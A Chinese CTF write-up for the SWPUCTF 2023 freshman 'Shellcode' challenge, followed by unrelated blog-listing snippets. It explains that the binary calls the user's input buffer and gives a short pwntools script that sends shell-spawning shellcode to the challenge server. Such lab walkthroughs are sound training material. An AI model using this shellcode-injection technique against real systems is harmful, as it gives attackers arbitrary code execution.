远程连接环境。没什么有效信息,只是提示我们这道题会用到 shellcode。

file 查看文件。64 位可执行 ELF 文件。

checksec 查看文件安全属性。有了栈溢出保护,以及 PIE 保护

IDA 打开文件,尝试反编译,但是失败了。

直接看汇编代码。



lea rax, [ebp+buf]:rax指向用户输入的缓冲区

call rax:直接调用用户输入的缓冲区地址

所以这题只需要发送一个shellcode就可以执行任意代码

exp:

from pwn import *

r=remote('node4.anna.nssctf.cn',28998)  

context.log_level='debug'

context.arch='amd64'

context.os='linux'

shellcode=asm(shellcraft.sh())  

r.send(shellcode)

r.interactive()

得到 flag

PWN手的成长之路-09-SWPUCTF 2023 秋季新生赛Shellcode的更多相关文章

  1. 专访雷水果国:离1.5K至18K 一个程序猿5每年的成长之路

    我只是一个小菜鸟,对于自主学习和交流PHP(jquery,linux,lamp,shell,javascript,server)等一系列的知识.小菜鸟创建了一个群.希望光临本博客的人能够进来交流. 寻 ...

  2. 我的Cocos Creator成长之路1环境搭建以及基本的文档阅读

    本人原来一直是做cocos-js和cocos-lua的,应公司发展需要,现转型为creator.会在自己的博客上记录自己的成长之路. 1.文档阅读:(cocos的官方文档) http://docs.c ...

  3. 《菜鸟程序员成长之路:从技术小白到阿里巴巴Java工程师》

    <菜鸟程序员成长之路:从技术小白到阿里巴巴Java工程师> 国庆节快乐!一年一度长度排第二的假期终于来了. 难得有十一长假,作者也想要休息几天啦. 不管你是选择出门玩,还是在公司加班,在学 ...

  4. 原创电子书《菜鸟程序员成长之路:从技术小白到阿里巴巴Java工程师》

    <菜鸟程序员成长之路:从技术小白到阿里巴巴Java工程师> 国庆节快乐!一年一度长度排第二的假期终于来了. 难得有十一长假,作者也想要休息几天啦. 不管你是选择出门玩,还是在公司加班,在学 ...

  5. (转)Python成长之路【第九篇】:Python基础之面向对象

    一.三大编程范式 正本清源一:有人说,函数式编程就是用函数编程-->错误1 编程范式即编程的方法论,标识一种编程风格 大家学习了基本的Python语法后,大家就可以写Python代码了,然后每个 ...

  6. redis成长之路——(二)

    redis操作封装 针对这些常用结构,StackExchange.Redis已经做了一些封装,不过在实际应用场景中还必须添加一些功能,例如重试等 所以对一些常功能做了一些自行封装SERedisOper ...

  7. redis成长之路——(一)

    为什么使用redis Redis适合所有数据in-momory的场景,虽然Redis也提供持久化功能,但实际更多的是一个disk-backed的功能,跟传统意义上的持久化有比较大的差别,那么可能大家就 ...

  8. 【腾讯Bugly干货分享】JSPatch 成长之路

    本文来自于腾讯bugly开发者社区,非经作者同意,请勿转载,原文地址:http://dev.qq.com/topic/579efa7083355a9a57a1ac5b Dev Club 是一个交流移动 ...

  9. redis成长之路——(七)

    扩展性封装 虽说现在StackExchange.Redis免费,万一到时候和servicestack.redis一样要收费呢,所以先留一口,后续的可以再处理 实例代码点击这里查看 redis成长之路- ...

  10. redis成长之路——(六)

    redis配置 为了码农在代码上只关心业务以及代码上的统一性,wenli.drive.redis内部使用配置来完成那些不同的场景,也就是说随便填填配置就能适应不同的场景! 当然配置多了码农也会受不了, ...

随机推荐

  1. java 数据传递? 两个对话框之间

    简介 java 数据传递,简单通过类对象传递? 两个对话框之间 Q&A 但是不知道是如何实现模态的对话框的,看了几遍也还不知道? JDialog 第二个参数就是模态和非模态的选择 code p ...

  2. 如何打开超过20G的sql文件

    最近在导项目中数据的流程时,对原数据库做了备份,备份好的sql文件有40G左右,通过一番折腾把数据库拿到本地PC,发现PC机直接弄不行: 平时经常使用的NotePad++,提示文本太大无法打开: PC ...

  3. Day1 备战CCF-CSP练习

    Day 1 201403-1 题目描述 有 \(N\) 个非零且各不相同的整数.请你编一个程序求出它们中有多少对相反数(\(a\) 和 \(-a\) 为一对相反数). 输入格式 第一行包含一个正整数 ...

  4. ETLCloud中数据脱敏规则的使用技巧

    数据脱敏,即在数据处理过程中,运用多样化的技术手段,对数据里的敏感信息予以屏蔽或替换,以此保障个人隐私与敏感信息的安全性.数据脱敏一般应用于数据共享.数据分析以及软件测试等场景之中,其核心目的在于削减 ...

  5. iPaaS集成平台与ESB在应用场景上的区别

    在当今企业数字化转型的浪潮中,集成平台的重要性日益凸显.谷云科技作为企业集成平台技术厂商,在与客户的交流过程中,一个频繁被提及的问题是:ESB与iPaaS到底有何区别? 今天就让我们深入探讨一下这两者 ...

  6. RestCloud ETL社区版序列号相关咨讯

  7. 如何搭建企业级MQ消息集成平台

    企业级MQ消息集成平台的重要性在于实现不同系统之间的高效.可靠.实时的消息传递和数据交换.它可以帮助企业实现系统解耦,提高系统的可扩展性和灵活性,降低系统间的依赖性.通过消息队列中间件,企业可以实现异 ...

  8. API低代码开发平台的实际应用及好处

    API低代码开发平台是一种快速开发工具,可以帮助企业快速构建和部署应用程序,并提供易于使用的API集成. 实际应用 API低代码开发平台的应用范围非常广泛,包括但不限于以下几个方面: 企业级应用程序开 ...

  9. [转载]量子力学的Copenhagen学派Copenhagen Interpretation of Quantum Mechanics

    Origin: https://plato.stanford.edu/entries/qm-copenhagen/ Copenhagen Interpretation of Quantum Mecha ...

  10. 官宣!Dora-rs 官方中文教程正式发布!

    Dora-rs:是一个为现代AI机器人应用设计的.以数据流为核心的机器人开发框架 . 在机器人开发的世界里,我们常常面临这样的困境: 过于复杂: 传统软件栈学习曲线陡峭,配置繁琐,让快速原型验证成为奢 ...